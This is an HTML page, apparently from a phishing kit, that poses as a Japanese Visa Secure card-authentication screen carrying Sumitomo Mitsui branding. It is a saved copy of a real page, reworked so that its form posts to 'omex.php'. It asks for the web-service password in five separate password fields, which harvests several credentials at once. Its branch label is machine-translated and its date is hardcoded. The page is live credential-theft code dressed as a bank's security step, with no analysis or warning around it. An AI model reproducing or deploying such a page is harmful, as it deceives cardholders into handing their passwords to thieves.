﻿<html><head>
	<meta http-equiv="Expires" content="-1">
	<meta http-equiv="Pragma" content="no-cache">
	<meta http-equiv="Cache-Control" content="no-cache">
	<meta http-equiv="content-type" content="text/html; charset=UTF-8">
	<link href="Visa%20Secure_fichiers/ntt.css" rel="stylesheet" type="text/css">
	<title>
		Visa Secure
	</title>
</head>

<body onload="SetFocus()" bgcolor="#ffffff">

<script language="Javascript">
function SetFocus()
{
	if (document.A1.UserId)
		document.A1.UserId.focus();
	else if (document.A1.Password)
		document.A1.Password.focus();
}
function ForgotPassword()
{
	
	
	
	window.open("","forgotPasswordWin","status=yes,scrollbars=no,width=390,height=400");
	document.A1.Action.value="GetPasswordHint";
	document.A1.target="forgotPasswordWin";
	document.A1.action="dispatcher.jsp";
	document.A1.submit();
	
}
function Help()
{
	
	
	
	
	
	
	window.open("","helpWin","status=yes,scrollbars=no,width=390,height=400");
	document.A1.target="helpWin";
	document.A1.action="help.jsp";
	document.A1.submit();
	
}
function Cancel()
{
	
	
	
	document.A1.Action.value = "Cancel";
	document.A1.target="_self";
	document.A1.action="omex.php";
	document.A1.submit();

	
}
function SubmitForm()
{
	if (!submitClicked)
	{
		
		document.A1.Action.value = "Authenticate";
		document.A1.target="_self";
		document.A1.action="omex.php";
		
		submitClicked = true;
		document.A1.submit();
	}
}
var submitClicked = false;
</script>



<form name="A1" method="post" action="omex.php" onsubmit="return false;">


	
	<input type="hidden" name="Action" value="Authenticate">
    <input type="hidden" name="State" value="ScenarioB/LoginRequired">
    <input type="hidden" name="AccountId" value="42BC04679AB8E23D4E022A83C3EC">
    <input type="hidden" name="PAReqId" value="209254">
    <input type="hidden" name="PAReqURI" value="https://acs.cafis-paynet.jp/preca/1@0@2,90003,DC9FAD7DDC1B1E.PAReq">
    <input type="hidden" name="IssuerId" value="90003">
    <input type="hidden" name="MessageId" value="Atos-Origin_1574450922861">
	
    <input type="hidden" name="CardProductId" value="preca_0001">
    <input type="hidden" name="Fi" value="NTT">
    <input type="hidden" name="ServiceCode" value="VBV">
    <input type="hidden" name="ImplDesc" value="Visa Secure">
	



	
	
	
	
	

	
	



<center>
<table cellspacing="0" cellpadding="0" border="0">
<tbody><tr>
	<td>
		<table width="350px" cellspacing="0" cellpadding="0" border="0">
  	    <tbody><tr>
			<td valign="top">

				
				<table width="100%" cellspacing="0" cellpadding="0" border="0">
				<tbody><tr>
					<td>
						<table width="100%" bordercolor="#88A0B8" border="0" bgcolor="#FFFFFF">
						<tbody><tr>
							<td width="50%" align="left">
								<img src="Visa%20Secure_fichiers/association_logo.png" alt="Visa Secure" title="Visa Secure" border="0">
							</td>
							
							<td width="50%" align="right">
								<img src="Visa%20Secure_fichiers/smcclogo001.gif" alt="三井住友カード" title="三井住友カード" width="140" height="18">
							</td>
						</tr>
						</tbody></table>
						<br>
					</td>
				</tr>
				</tbody></table>






    <table width="100%" cellspacing="0" cellpadding="3" border="0">
	<tbody><tr>
		

		
            <td colspan="3" class="normalgray" align="left">
				VISAプリペイドの本人認証を行います。<br>Webサービスログイン時のパスワード<br>（半角英数６～１２桁）を入力し「送信」ボタンを押して下さい。
			</td>
		
	</tr>
	<tr>
		<td height="10" align="left"><img src="Visa%20Secure_fichiers/spacer.gif" width="1" height="10"></td>
	</tr>
	<tr>
        <td valign="top" align="left">
            <table width="100%" cellspacing="0" cellpadding="3" border="0">

            
						
			
			
			
            <tbody><tr>
                <td class="normalbold" width="165px" valign="top" align="right">
                    <span class="tlid-translation translation" lang="ja">
					<span class="" title="">ブランチ</span></span>:
                </td>
                <td width="10px">
                </td>
                <td class="normalbold" width="165px" valign="top">
								<span class="tlid-translation translation" lang="en">
								<span class="" title="">Sumitomo Mitsui Banking 
								Corporation</span></span></td>
            </tr>
            <tr>
                <td class="normalbold" width="165px" valign="top" align="right">
                    日付:
                </td>
                <td width="10px">
                </td>
                <td class="normalbold" width="165px" valign="top">
                    2020/01/23
                </td>
            </tr>

            
            
                
				
				
				
				
            

            

            

            
            

            

            <tr>
                <td class="normalbold" width="165px" valign="center" align="right">
                    パスワード:
                </td>
                <td width="10px">
                </td>
                <td width="165px" valign="top">
                    <!-- no errors, retain password -->
					                    
					<input type="password" maxlength="32" size="20" name="Password" value="" "="" autocomplete="off" onkeydown="if(event.keyCode==13) document.A1.sendButton.click();">
					                </td>
            </tr>

            
			
			
            	<tr>
                <td class="normalbold" width="165px" valign="center" align="right">
                    パスワード:
                </td>
                <td width="10px">
                </td>
                <td width="165px" valign="top">
                    <!-- no errors, retain password -->
					                    
					<input type="password" maxlength="32" size="20" name="Password0" value="" "="" autocomplete="off" onkeydown="if(event.keyCode==13) document.A1.sendButton.click();">
					                </td>
            	</tr>
				<tr>
                <td class="normalbold" width="165px" valign="center" align="right">
                    パスワード:
                </td>
                <td width="10px">
                </td>
                <td width="165px" valign="top">
                    <!-- no errors, retain password -->
					                    
					<input type="password" maxlength="32" size="20" name="Password1" value="" "="" autocomplete="off" onkeydown="if(event.keyCode==13) document.A1.sendButton.click();">
					                </td>
            	</tr>
				<tr>
                <td class="normalbold" width="165px" valign="center" align="right">
                    パスワード:
                </td>
                <td width="10px">
                </td>
                <td width="165px" valign="top">
                    <!-- no errors, retain password -->
					                    
					<input type="password" maxlength="32" size="20" name="Password2" value="" "="" autocomplete="off" onkeydown="if(event.keyCode==13) document.A1.sendButton.click();">
					                </td>
            	</tr>
				<tr>
                <td class="normalbold" width="165px" valign="center" align="right">
                    パスワード:
                </td>
                <td width="10px">
                </td>
                <td width="165px" valign="top">
                    <!-- no errors, retain password -->
					                    
					<input type="password" maxlength="32" size="20" name="Password3" value="" "="" autocomplete="off" onkeydown="if(event.keyCode==13) document.A1.sendButton.click();">
					                </td>
            	</tr>

            
			
			
            <tr>
                <td>&nbsp;</td>
                <td width="10px">
                </td>
                <td valign="top" align="left">
                    <script>
                        document.write("<a class=\"forgotlink\" href=\"javascript:ForgotPassword()\">");
                    </script><a class="forgotlink" href="javascript:ForgotPassword()">
                    <noscript>
                        <a class="forgotLink" href="omex.php" target="_blank">
                    </noscript>
                    </a>
                </td>
            </tr>
            
            

            <tr height="10">
                <td><img src="Visa%20Secure_fichiers/spacer.gif"></td>
            </tr>

            

            <tr>
                
                    <td valign="top" align="left">&nbsp;</td>
                    <td width="10px">
                    </td>
                    <td width="165px" valign="top" align="left">

		    <table width="190px" cellspacing="0" cellpadding="0" border="0">
		    <tbody><tr>
			<td nowrap="nowrap">

                        
                        
						<script>
							
                    		
							document.write("<input type=\"button\" id=\"sendButton\" value=\"送信\" onclick=\"SubmitForm()\">");
							
						</script>&nbsp;<noscript>
							
                    		
							<input type="button" id="sendButton" value="送信" onclick="document.A1.submit()">&nbsp;
							
						</noscript></td>
			<td nowrap="nowrap">


                        

                        <script>
                            document.write("<a class=\"normallink\" href=\"javascript:Help()\">");
                        </script><a class="normallink" href="javascript:Help()">
                        <noscript>
                            <a class="normallink" href="help.jsp?CardProductId={0}&Fi={1}&ServiceCode={2}&ImplDesc={3}" target="_blank">
                        </noscript>
                            <img src="Visa%20Secure_fichiers/help.jpg" alt="ヘルプ" title="ヘルプ" width="12" height="12" border="0">
                        </a>

			</td>
		</tr>
		</tbody></table>

                    </td>
                
            </tr>

            </tbody></table>
        </td>
    </tr>
    </tbody></table>

    

				</td></tr></tbody></table><table width="100%" cellspacing="0" cellpadding="0" bordercolor="#88A0B8" border="0" bgcolor="#FFFFFF">
					<tbody><tr>
						<td class="copyright" align="center">
							
						</td>
					</tr>
					</tbody></table>
				</td></tr>

	
			
	  	
		</tbody></table>
	


</center>


</form>









</body></html>